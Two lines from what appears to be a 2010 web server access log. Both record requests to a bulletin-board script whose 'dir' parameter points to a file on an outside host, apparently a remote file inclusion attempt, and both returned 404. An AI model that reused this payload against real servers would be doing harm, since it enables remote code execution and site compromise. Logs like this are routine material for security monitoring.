89.234.63.107 - - [17/Jan/2010:21:21:07 -0800] "GET /logs/access_091214.log%20%20//skin/happycast_board/view.php?dir=http://www.sudsalentocultura.it/mail/idxx.pdf??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.234.63.107 - - [17/Jan/2010:21:21:13 -0800] "GET /skin/happycast_board/view.php?dir=http://www.sudsalentocultura.it/mail/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
